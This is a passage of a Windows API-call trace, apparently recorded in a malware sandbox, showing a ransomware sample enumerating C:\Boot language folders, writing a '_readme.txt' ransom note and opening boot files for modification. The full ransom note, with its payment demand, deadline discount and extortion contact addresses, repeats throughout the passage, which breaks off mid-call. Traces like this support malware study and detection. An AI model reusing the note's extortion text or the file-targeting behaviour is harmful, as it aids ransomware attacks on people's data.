1 [0228.051] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.051] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.051] PathFindFileNameW (pszPath="") returned="" [0228.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.051] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.051] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.051] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0228.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.052] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x37a3390 [0228.052] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0228.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.052] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0228.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.052] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.053] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.053] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0228.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0228.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.053] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.053] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.053] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.054] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0228.054] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0228.054] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.054] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0228.054] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.054] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.055] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0228.055] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.056] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.056] PathFindFileNameW (pszPath="") returned="" [0228.056] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.056] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.056] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.056] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.057] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0228.057] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0228.057] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.057] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.057] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0228.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0228.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.058] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.058] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.058] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.058] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0228.058] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0228.058] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.058] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0228.058] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.058] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: 